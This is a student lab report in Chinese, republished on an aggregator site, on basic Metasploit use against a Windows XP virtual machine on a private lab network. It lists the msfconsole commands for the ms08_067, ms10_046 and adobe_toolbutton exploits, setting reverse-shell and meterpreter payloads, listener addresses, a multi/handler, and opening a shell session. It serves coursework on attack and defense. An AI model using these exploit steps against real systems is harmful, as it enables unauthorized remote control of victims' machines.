Exp5 MSF基础应用 20154302 薛师凡

Posted xueshifan

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Exp5 MSF基础应用 20154302 薛师凡相关的知识,希望对你有一定的参考价值。

Exp5 MSF基础应用

20154302 薛师凡

一、基础问题回答

(1)用自己的话解释什么是 exploit , payload , encode.

exploit:

是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

payload:

就是被运送的间谍,到了房子里头就可以执行各种间谍活动。简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

encode:

是间谍穿的伪装的衣服,便于间谍潜入目标针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

二、实践过程

本次试验共分为四个部分:

  • 1.一个主动攻击实践,ms08_067

  • 2.一个针对浏览器的攻击,ms10_046漏洞攻击

  • 3.一个针对客户端的攻击,adobe_toolbutton

  • 4.成功应用任何一个辅助模块scanner/postscan/tcp
    和gather blowser_info

实验环境:

攻击机:kali:192.168.238.131
靶机:Windows:192.168.238.130

2.1主动攻击:ms08_067

先百度一下ms08_067漏洞的意思

参考学长的报告得知英文版XP才可以进行漏洞攻击
1.首先查看两个主机的IP地址

2.先msfconsole,再kali主机键入search ms08_067 查看漏洞信息
键输入use exploit/windows/smb/ms08_067_netapi,

3.然后键入show payloads查看需要的payload

此处首先从众地输入了set payload generic/shell_reverse_tcp选择病毒模块

show options查看需要的信息,进行相应设置

4.键入show targets查看适用的靶机版本,可以set target 0自动选择

5.设置好以后输入exploit进行攻击。

连接不上靶机,攻击失败
然后各种失败

然后又互相ping一下,发现WinXP可以ping通kali,但是kali却ping不通WinXP,
,果断关闭防火墙,现在可以ping通了。

再进行攻击,还是失败,于是无奈之下选择了更换病毒模块。

终于成功了!

2. 对浏览器攻击:ms10_046漏洞攻击

基本步骤还是和上面一样,先利用search ms10_046指令查看可以运用的攻击模块:

用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用show payloads查看可以供我们使用的payload:

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

set LHOST 192.168.238.131
set SRVHOST 192.168.238.131

使用exploit指令执行漏洞,可以看到生成了一个url,在靶机的IE浏览器上使用该url进行访问,

又失败了几次,


换了病毒模块

在MSF终端看见漏洞执行成功:

使用sessions指令查看当前存在的会话,可以看到存在一个ID为1的会话:

使用sessions -i 1选择会话1,成功获取了靶机的shell,利用systeminfo指令查看靶机的系统信息:

3. 对Adobe的漏洞攻击:adobe_toolbutton

先使用search adobe查询和adobe漏洞有关的模块,我选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块,设置回连的payload:

set LHOST 192.168.238.131
set LPORT 4302
set FILENAME 20154302.pdf
设置:

设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:

use exploit/multi/handler
set payload generic/shell_reverse_tcp windows/meterpreter/reverse_tcp

然后将该文件传送到靶机上,并且在攻击机上打开监听:

将靶机中的pdf文件打开,攻击机成功获取到靶机shell:

4、辅助模块应用

辅助模块真的好多啊

这里我用了scanner/postscan/tcp模块
查看其设置的参数

设置好之后,扫描
好像是失败了

更改了设置,好像也没有用

我之后换了gather blowser_info,通过过网站访问来搜集浏览器信息的

info查看要设置的参数,设置好,这次成功了,可以看到系统的信息

三、实验体会

本次实验让我又一次认识了MSF,功能真的强大,
这次实验我们的攻击对象只是XP系统的虚拟机,比较有局限性,随着网络攻击技术的进步,我们更应该学会漏洞的扫描和分析,以及及时的去打好补丁。本次实验从第一个开始就十分不顺利,屡次失败,通过调试网络和更换病毒模块最终取得成功,总体来说还是收获颇丰,而且还磨练了自己的耐心。

以上是关于Exp5 MSF基础应用 20154302 薛师凡的主要内容,如果未能解决你的问题,请参考以下文章

20154302薛师凡 Exp9 Web安全基础

Exp2 后门原理与实践 20154302薛师凡

Exp5 MSF基础应用

20155211 Exp5 MSF基础应用

20165306 Exp5 MSF基础应用

20155330 《网络对抗》 Exp5 MSF基础应用